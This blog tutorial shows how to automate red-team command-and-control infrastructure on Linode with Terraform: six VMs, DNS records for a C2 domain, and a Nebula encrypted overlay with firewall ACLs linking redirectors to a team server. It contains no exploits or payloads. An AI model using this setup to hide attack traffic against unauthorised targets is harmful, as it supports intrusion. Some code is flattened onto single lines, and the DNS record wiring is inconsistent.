In this post, I will show readers how to build a fully automated C2 infrastructure using Terraform, with an end-to-end encrypted backend communication layer powered by Nebula.
Being able to stand up a C2 infrastructure in minutes, including all of the associated setup and teardown logic, is a huge advantage for any offensive security team or operator. In this article, I will demonstrate in detail how to build a fully automated C2 infrastructure using Terraform, Nebula, Caddy, and Cobalt Strike.
Special thanks to @byt3bl33d3r and @bin3xish477 for bringing to my attention that Caddy can be used as a replacement for Nginx/Apache.
TL;DR
If reading everything below is too much for you :) you can simply skim the article, and if you are only interested in the code, check out the git repo below.
https://github.com/maliciousgroup/C2_Automation?ref=blog.malicious.group
Prerequisites
During development, I will be using Kali Linux as the host operating system and JetBrains' PyCharm Professional for HCL and Python development. For cloud resources, I will be using Linode as the provider for the virtual machines and DNS setup.
While covering this material, I will also assume the reader already knows at least some of the topics being presented, but just in case, I will post reference links along the way.
Build Setup
I will be using Python as a wrapper around the Terraform build so that, once built and tested, it can easily evolve into a tool that is friendlier to automate; however, most of the work will happen on the command line within the Python project.
The first step is to prepare a new Python 3.9 project with a virtual environment for easy management, as shown below.
After creating the new project, open the terminal in the IDE (Alt + F12) and create the following folders.
mkdir -p src/{config,templates}
mkdir -p src/templates/{certificates,configs,files,keys}
mkdir -p src/templates/configs/{nebula,web}
If the commands execute successfully, you should see the following file structure in your project.
With the initial folder structure done, the next step is to download the Terraform binary and place it in the venv/bin folder. This ensures the binary is on the virtual environment's execution PATH.
wget -O /tmp/tf.zip https://releases.hashicorp.com/terraform/1.2.9/terraform_1.2.9_linux_amd64.zip
unzip /tmp/tf.zip -d venv/bin/
Once the Terraform binary is in place, I should be able to check the version by running the following command.
terraform -version
With the Terraform binary ready and the initial folder structure complete, I can start focusing on building the infrastructure. First, I need to build the templates for the Linode provider in order to launch the six (6) different machines used in this build.
Virtual Machines
To start, I will create all the template files needed to manage the various resources by running the following touch command in the src/templates directory.
cd src/templates
touch {providers,edge-redirectors,internal-redirectors,variables,output,team-server,lighthouse,security,dns}.tf
If the commands above succeed, the file structure should look like the following.
The first file I will modify is providers.tf, since it is required to connect to the Linode API. The documentation at https://registry.terraform.io/providers/linode/linode/latest/docs?ref=blog.malicious.group shows the exact format and version of the provider to use when creating Terraform templates against the latest release.
providers.tf
terraform {
  required_providers {
    linode = {
      source = "linode/linode"
    }
  }
}

provider "linode" {
  token = var.linode_token
}
As you can see from the file above, the Linode provider also requires a token (API key), which I will add to the variables.tf file as shown below.
variables.tf
variable"linode_token" {description = "The Linode API Token" default = "920fd6f3d417600c871ff40..."}variable "linode_domain" {description = "The domain to be used at Linode" default = "windows.pe"}
The variables.tf file also holds a linode_domain variable that stores the C2 domain used throughout the build.
The six virtual machines used in this build are stored across four files:
- lighthouse.tf
- team-server.tf
- edge-redirectors.tf
- internal-redirectors.tf
The edge-redirectors.tf and internal-redirectors.tf templates each contain two virtual machines; the other templates contain only one. The virtual machines are shown as green icons in the network diagram below.
Before creating the templates for each of the instances above, I first need to set up an SSH key. This can be fully automated using the Terraform tls_private_key resource, which generates a secure private key and encodes it as PEM (RFC 1421) and OpenSSH PEM (RFC 4716). To do this, I will modify the security.tf file in the src/templates directory as shown below.
security.tf
resource"random_string""random" {length = 16 special = true}resource "tls_private_key""temp_key" {algorithm = "RSA" rsa_bits = 4096}resource "linode_sshkey""ssh_key" {label = "key" ssh_key = chomp(tls_private_key.temp_key.public_key_openssh)}
The linode_sshkey resource is required to build each instance, and by using the built-in tls_private_key resource I can dynamically generate a 4096-bit RSA key that is then used to access each instance during the setup and installation process. The other resource used in this file is random_string, which generates the random root password assigned to each instance.
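Because this key pair lives only in Terraform state, it can be useful to pull it out for manual debugging. A minimal sketch, assuming jq is installed, and keeping in mind that the state file holds this key in plaintext:

# Sketch: recover the generated private key from state for manual SSH access
terraform show -json terraform.tfstate \
  | jq -r '.values.root_module.resources[]
           | select(.address == "tls_private_key.temp_key")
           | .values.private_key_pem' > /tmp/temp_key.pem
chmod 600 /tmp/temp_key.pem
# ssh -i /tmp/temp_key.pem root@<instance-ip>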
Now I can start building each machine template using the linode_instance resource, as shown in the files below. At this point, every machine template will be identical except for the label name of each linode_instance.
lighthouse.tf
resource"linode_instance""lighthouse" {label = "lighthouse" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","touch /tmp/task.complete" ] }}
edge-redirectors.tf
# HTTPS Dedicated Redirector
resource "linode_instance" "edge-redirector-1" {
  label           = "edge-redirector-1"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = []

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "touch /tmp/task.complete"
    ]
  }
}

# DNS Dedicated Redirector
resource "linode_instance" "edge-redirector-2" {
  label           = "edge-redirector-2"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = []

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "touch /tmp/task.complete"
    ]
  }
}
internal-redirectors.tf
# HTTPS Internal Redirector
resource "linode_instance" "internal-redirector-1" {
  label           = "internal-redirector-1"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = []

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "touch /tmp/task.complete"
    ]
  }
}

# DNS Internal Redirector
resource "linode_instance" "internal-redirector-2" {
  label           = "internal-redirector-2"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = []

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "touch /tmp/task.complete"
    ]
  }
}
resource"linode_instance""team-server" {label = "team-server" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","touch /tmp/task.complete" ] }}
All of the instances above use the linode_instance resource, which is specific to the Linode provider configured in providers.tf. The linode_instance resource has various options, such as image for setting the operating system, along with the region and label of the machine itself.
Each template also contains a connection block that sets the connection variables needed to SSH into the instance. The connection block is required in order to use the remote-exec provisioner, which lets bootstrap terminal commands run once the machine comes online.
Now that all the templates are done, I can display each instance's IP address using output directives in the output.tf file. Once the build completes, it will show each instance's name and IP address.
output "lighthouse" {value = linode_instance.lighthouse.ip_address}output "edge-redirector-1" {value = linode_instance.edge-redirector-1.ip_address}output "edge-redirector-2" {value = linode_instance.edge-redirector-2.ip_address}output "internal-redirector-1" {value = linode_instance.internal-redirector-1.ip_address}output "internal-redirector-2" {value = linode_instance.internal-redirector-2.ip_address}output "team-server" {value = linode_instance.team-server.ip_address}
Once the build completes, the output directives print the value associated with each block. At this point, I can run a test to make sure the instances actually build without any errors, which can be done with the Terraform commands shown below.
terraform init
The terraform init command initializes a working directory containing Terraform configuration files. This is the first command that should be run after writing a new Terraform configuration or cloning an existing one. It is safe to run this command multiple times.
terraform apply
The terraform apply command executes the actions proposed in a Terraform plan. If the configuration has no syntax errors, it will prompt the user to enter "yes" to start the build.
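For scripted runs, like the Python wrapper at the end of this article, the prompt can be skipped; a small sketch of the non-interactive flow from the src/templates directory:

terraform init                 # download the linode/linode provider
terraform validate             # catch HCL syntax errors before building anything
terraform apply -auto-approve  # apply without the interactive "yes" prompt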
On successful creation, you should see the six instance IP addresses printed in the Outputs section as shown above. To verify, I can also see in the Linode dashboard that the instances were created without any issues.
Now that I know the current build succeeds, I will destroy the infrastructure before moving on, to avoid making changes while the infrastructure configuration is still live. The following command destroys the build.
terraform destroy
The terraform destroy command is a convenient way to destroy all remote objects managed by a particular Terraform configuration.
On success, you can see that all resources were destroyed without errors. The build has reached a stable state, so it's time to set up the DNS records before moving on to the Nebula end-to-end encrypted network layer.
DNS Setup
To create the DNS records needed to correctly route DNS and HTTPS traffic, I will create a dns.tf template that adds the domain to the Linode account and then creates three (3) different DNS records to handle HTTP and DNS routing.
dns.tf
resource"linode_domain""c2-domain" {type = "master" domain = var.linode_domain soa_email = "soa@${var.linode_domain}" tags = [] depends_on = [linode_instance.edge-redirector-1]}resource "linode_domain_record""root" {domain_id = linode_domain.c2-domain.id name = var.linode_domain record_type = "A" target = linode_instance.edge-redirector-1.ip_address depends_on = [linode_instance.edge-redirector-1]}resource "linode_domain_record""ns1" {domain_id = linode_domain.c2-domain.id name = "ns1" record_type = "A" target = linode_instance.internal-redirector-2.ip_address depends_on = [linode_instance.edge-redirector-2]}resource "linode_domain_record""dns" {domain_id = linode_domain.c2-domain.id record_type = "NS" target = "ns1.${var.linode_domain}" depends_on = [linode_domain_record.ns1]}
In the dns.tf template above, I use two new resources from the same linode provider. The linode_domain resource identifies or creates the specific domain on the Linode account, and the linode_domain_record resource sets the individual DNS records for that domain. The depends_on directive also ensures the virtual machines are created before the DNS changes are applied.
Now run another build test to make sure the DNS records are created with the correct IPs, as intended.
terraform apply
The build succeeded, so now I need to check the Linode dashboard to verify that the windows.pe domain was added to the account.
Good, now check to make sure the correct records were created, pointing at the correct virtual machines.
Success! The domain was added and the correct records were created. With the virtual machines set up and DNS configured, I can now focus on creating the Nebula end-to-end encrypted network layer to securely tunnel C2 traffic to the team server.
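The records can also be verified from the command line instead of the dashboard; a quick sketch with dig, assuming Linode's ns1.linode.com is authoritative for the zone:

dig +short A windows.pe @ns1.linode.com      # expect edge-redirector-1's IP
dig +short A ns1.windows.pe @ns1.linode.com  # expect edge-redirector-2's IP
dig +short NS windows.pe @ns1.linode.com     # expect ns1.windows.pe in the answer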
Operator SSH Key Setup
Now it's time to write a small bash script that generates the operator SSH key when the infrastructure is built and deletes that key when the infrastructure is destroyed. For this, I will add the following generate_key.sh file to the src/templates/keys directory, as shown below.
generate_key.sh
#!/usr/bin/env bash
# shellcheck disable=SC2046
# shellcheck disable=SC2164

SCRIPT_PATH="$(cd $(dirname "$0") > /dev/null 2>&1; pwd -P)"

if test -f "${SCRIPT_PATH}"/red_nebula_rsa; then
  echo "[Warning] Keys seem to already exist. Skipping key generation"
  exit
fi

if ! ssh-keygen -b 4096 -t rsa -f "${SCRIPT_PATH}"/red_nebula_rsa -q -N ""; then
  echo "[Error] There was an error generating the SSH key for Terraform"
  exit
fi
To make sure this bash script runs at build time, and that the keys it creates are deleted during destruction, I will create two new templates in the next section to handle that functionality.
Nebula Setup
To set up the Nebula network, the host building the infrastructure needs to download the Nebula binaries, generate a new CA certificate, and then generate keys for each machine used in this build. This can all be done before any machines are created, which lets me move the specific keys to each host to test and verify the state of the network.
To make this happen, I will create two new files in the src/templates directory. These two files, named setup.tf and cleanup.tf, handle all pre-build and post-build actions to ensure the operator has a clean environment between runs.
setup.tf
resource "null_resource""setup" { provisioner "local-exec" {command = <<-EOT wget -O /tmp/nebula.tar.gz https://github.com/slackhq/nebula/releases/download/v1.6.0/nebula-linux-amd64.tar.gzmkdir /tmp/nebula tar -zxvf /tmp/nebula.tar.gz -C /tmp/nebula chmod +xkeys/generate_key.shkeys/generate_key.shcd certificates && /tmp/nebula/nebula-cert ca -name "Red Nebula, Inc" /tmp/nebula/nebula-cert sign -name "lighthouse1" -ip "192.168.100.1/24" /tmp/nebula/nebula-cert sign -name "edge-redirector-1" -ip "192.168.100.10/24" -groups "edge" /tmp/nebula/nebula-cert sign -name "edge-redirector-2" -ip "192.168.100.20/24" -groups "edge" /tmp/nebula/nebula-cert sign -name "internal-redirector-1" -ip "192.168.100.110/24" -groups "internal" /tmp/nebula/nebula-cert sign -name "internal-redirector-2" -ip "192.168.100.120/24" -groups "internal" /tmp/nebula/nebula-cert sign -name "team-server" -ip "192.168.100.200/24" -groups "team-server" /tmp/nebula/nebula-cert sign -name "operator" -ip "192.168.100.250/24" -groups "operator" EOT interpreter = ["/usr/bin/env", "bash", "-c"] }}
The setup.tf template above downloads the Nebula binaries, then sets up the new CA certificate and generates keys for each machine that will connect to the Nebula network. It also contains two commands that make the generate_key.sh bash script from above executable and run it.
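Before any machines exist, the generated certificates can be sanity-checked locally; a sketch using the print command that ships with nebula-cert:

/tmp/nebula/nebula-cert print -path certificates/ca.crt
/tmp/nebula/nebula-cert print -path certificates/team-server.crt  # shows the name, IP, and groups baked into the cert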
cleanup.tf
resource "null_resource""pre_setup" { provisioner "local-exec" { when = destroycommand = <<-EOT rm certificates/* rm keys/red* rm -rf /tmp/working_dir /tmp/nebula* EOT interpreter = ["/usr/bin/env", "bash", "-c"] }}
In the cleanup.tf template above, the files generated during the build are all deleted and the working directories removed.
Now that the Nebula keys are created during the build, I need to create the Nebula configuration files that set each node's IP range and individual address, along with ACL rules to allow specific traffic. The following configuration files will be stored in the src/templates/configs/nebula directory.
- config-lighthouse.yaml
- config-teamserver.yaml
- config-edge.yaml
- config-internal.yaml
- config-operator.yaml
config-lighthouse.yaml
pki:
  ca: /etc/nebula/ca.crt
  cert: /etc/nebula/host.crt
  key: /etc/nebula/host.key

static_host_map:

lighthouse:
  am_lighthouse: true

listen:
  host: 0.0.0.0
  port: 4242

firewall:
  conntrack:
    tcp_timeout: 12m
    udp_timeout: 3m
    default_timeout: 10m

  outbound:
    - port: any
      proto: icmp
      host: any

  inbound:
    - port: any
      proto: icmp
      host: any
The only ACLs in the "Lighthouse" configuration allow ICMP traffic from the other Nebula-connected nodes. This is purely to verify that all nodes are connected, and it can be removed as a security precaution.
config-teamserver.yaml
pki:
  ca: /etc/nebula/ca.crt
  cert: /etc/nebula/host.crt
  key: /etc/nebula/host.key

static_host_map:
  "192.168.100.1": ["LIGHTHOUSE_IP_ADDRESS:4242"]

lighthouse:
  am_lighthouse: false
  interval: 60
  hosts:
    - "192.168.100.1"

listen:
  host: 0.0.0.0
  port: 4242

firewall:
  conntrack:
    tcp_timeout: 12m
    udp_timeout: 3m
    default_timeout: 10m

  outbound:
    - port: any
      proto: icmp
      host: any
    - port: any
      proto: any
      group: internal
    - port: any
      proto: any
      group: operator

  inbound:
    - port: any
      proto: icmp
      host: any
    - port: any
      proto: any
      group: internal
    - port: any
      proto: any
      group: operator
The "Team-Server" configuration contains ACLs allowing traffic from the internal group and the operator group. Any C2 traffic reaching the "Team-Server" must first pass through the "Internal-Redirectors".
config-edge.yaml
pki:
  ca: /etc/nebula/ca.crt
  cert: /etc/nebula/host.crt
  key: /etc/nebula/host.key

static_host_map:
  "192.168.100.1": ["LIGHTHOUSE_IP_ADDRESS:4242"]

lighthouse:
  am_lighthouse: false
  interval: 60
  hosts:
    - "192.168.100.1"

listen:
  host: 0.0.0.0
  port: 4242

firewall:
  conntrack:
    tcp_timeout: 12m
    udp_timeout: 3m
    default_timeout: 10m

  outbound:
    - port: any
      proto: icmp
      host: any
    - port: any
      proto: any
      group: internal

  inbound:
    - port: any
      proto: icmp
      host: any
    - port: any
      proto: any
      group: internal
The "Edge-Redirectors" configuration contains ACLs that only allow traffic from the internal group, by design. Any C2 traffic hitting the "Edge-Redirectors" needs to be tunneled through the "Internal-Redirectors" to reach the "Team-Server".
config-internal.yaml
pki:
  ca: /etc/nebula/ca.crt
  cert: /etc/nebula/host.crt
  key: /etc/nebula/host.key

static_host_map:
  "192.168.100.1": ["LIGHTHOUSE_IP_ADDRESS:4242"]

lighthouse:
  am_lighthouse: false
  interval: 60
  hosts:
    - "192.168.100.1"

listen:
  host: 0.0.0.0
  port: 4242

firewall:
  conntrack:
    tcp_timeout: 12m
    udp_timeout: 3m
    default_timeout: 10m

  outbound:
    - port: any
      proto: icmp
      host: any
    - port: any
      proto: any
      group: edge
    - port: any
      proto: any
      group: team-server

  inbound:
    - port: any
      proto: icmp
      host: any
    - port: any
      proto: any
      group: edge
    - port: any
      proto: any
      group: team-server
The "Internal-Redirectors" configuration contains ACLs allowing traffic from the edge and team-server groups. This is because the "Internal-Redirectors" are responsible for moving data from the "Edge-Redirectors" to the "Team-Server".
config-operator.yaml
pki:
  ca: /tmp/nebula/ca.crt
  cert: /tmp/nebula/operator.crt
  key: /tmp/nebula/operator.key

static_host_map:
  "192.168.100.1": ["LIGHTHOUSE_IP_ADDRESS:4242"]

lighthouse:
  am_lighthouse: false
  interval: 60
  hosts:
    - "192.168.100.1"

listen:
  host: 0.0.0.0
  port: 4242

firewall:
  conntrack:
    tcp_timeout: 12m
    udp_timeout: 3m
    default_timeout: 10m

  outbound:
    - port: any
      proto: icmp
      host: any
    - port: any
      proto: any
      group: team-server

  inbound:
    - port: any
      proto: icmp
      host: any
    - port: any
      proto: any
      group: team-server
The "Operator" configuration contains ACLs with access to the "Team-Server" only.
You may also have noticed the LIGHTHOUSE_IP_ADDRESS placeholder; this will be replaced during the build using sed, once the lighthouse's public IP is known.
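Outside of the build, that substitution is a one-liner; a sketch using a documentation IP in place of the real lighthouse address:

sed -i 's/LIGHTHOUSE_IP_ADDRESS/203.0.113.10/g' config-edge.yaml  # 203.0.113.10 is a placeholder IP
grep -A1 static_host_map config-edge.yaml                         # confirm the placeholder is gone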
With the Nebula certificates, configurations, and keys created, it's time to figure out how to move all the required files to each machine during the build so Nebula has everything it needs to connect.
Fortunately, Terraform's file provisioner makes it easy to move files from the operator host to the remote machines: it takes a file as its source and the remote placement path as its destination. To ensure Nebula can connect on each machine, I need to modify the Linode templates to include the files and commands required to run Nebula.
lighthouse.tf
resource"linode_instance""lighthouse" {label = "lighthouse" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-lighthouse.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/lighthouse1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/lighthouse1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}
edge-redirectors.tf
# HTTPS Dedicated Redirector
resource "linode_instance" "edge-redirector-1" {
  label           = "edge-redirector-1"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = [linode_instance.lighthouse]

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "file" {
    source      = "keys/red_nebula_rsa.pub"
    destination = "/tmp/key.pub"
  }
  provisioner "file" {
    source      = "configs/nebula/config-edge.yaml"
    destination = "/tmp/config.yaml"
  }
  provisioner "file" {
    source      = "certificates/ca.crt"
    destination = "/tmp/ca.crt"
  }
  provisioner "file" {
    source      = "certificates/edge-redirector-1.crt"
    destination = "/tmp/host.crt"
  }
  provisioner "file" {
    source      = "certificates/edge-redirector-1.key"
    destination = "/tmp/host.key"
  }
  provisioner "file" {
    source      = "/tmp/nebula/nebula"
    destination = "/tmp/nebula"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "cat /tmp/key.pub >> /root/.ssh/authorized_keys",
      "rm /tmp/key.pub",
      "mkdir /etc/nebula",
      "mv /tmp/host.* /etc/nebula",
      "mv /tmp/ca.crt /etc/nebula",
      "mv /tmp/config.yaml /etc/nebula",
      "mv /tmp/nebula /etc/nebula/nebula",
      "sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml",
      "chmod +x /etc/nebula/nebula",
      "echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min",
      "touch /tmp/task.complete"
    ]
  }
}

# DNS Dedicated Redirector
resource "linode_instance" "edge-redirector-2" {
  label           = "edge-redirector-2"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = [linode_instance.lighthouse]

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "file" {
    source      = "keys/red_nebula_rsa.pub"
    destination = "/tmp/key.pub"
  }
  provisioner "file" {
    source      = "configs/nebula/config-edge.yaml"
    destination = "/tmp/config.yaml"
  }
  provisioner "file" {
    source      = "certificates/ca.crt"
    destination = "/tmp/ca.crt"
  }
  provisioner "file" {
    source      = "certificates/edge-redirector-2.crt"
    destination = "/tmp/host.crt"
  }
  provisioner "file" {
    source      = "certificates/edge-redirector-2.key"
    destination = "/tmp/host.key"
  }
  provisioner "file" {
    source      = "/tmp/nebula/nebula"
    destination = "/tmp/nebula"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "cat /tmp/key.pub >> /root/.ssh/authorized_keys",
      "rm /tmp/key.pub",
      "mkdir /etc/nebula",
      "mv /tmp/host.* /etc/nebula",
      "mv /tmp/ca.crt /etc/nebula",
      "mv /tmp/config.yaml /etc/nebula",
      "mv /tmp/nebula /etc/nebula/nebula",
      "sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml",
      "chmod +x /etc/nebula/nebula",
      "echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min",
      "touch /tmp/task.complete"
    ]
  }
}
# HTTPS Dedicated Internal Redirectorresource"linode_instance""internal-redirector-1" {label = "internal-redirector-1" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-internal.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/internal-redirector-1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/internal-redirector-1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}# DNS Dedicated Internal Redirectorresource "linode_instance""internal-redirector-2" {label = "internal-redirector-2" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-internal.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/internal-redirector-2.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/internal-redirector-2.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}
team-server.tf
resource"linode_instance""team-server" {label = "team-server" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-teamserver.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/team-server.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/team-server.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}
As described above, you can see six file provisioners that move the following files from the host to the remote servers:
- keys/red_nebula_rsa.pub
- configs/nebula/config-<instance>.yaml
- certificates/ca.crt
- certificates/<instance_name>.key
- certificates/<instance_name>.crt
- /tmp/nebula/nebula
After the file provisioners move everything into the /tmp directory, the remote-exec provisioner moves the files from /tmp into their final locations on the server. Once all the files are in place, the nebula binary is scheduled to start using the at command.
I should be able to test the build again, but this time I should be able to log into each machine with the SSH key generated during the build and make sure the Nebula network is up and connected.
terraform apply
If the build succeeds, you should see output like the image above. The IP address of each instance should also be shown in the output.
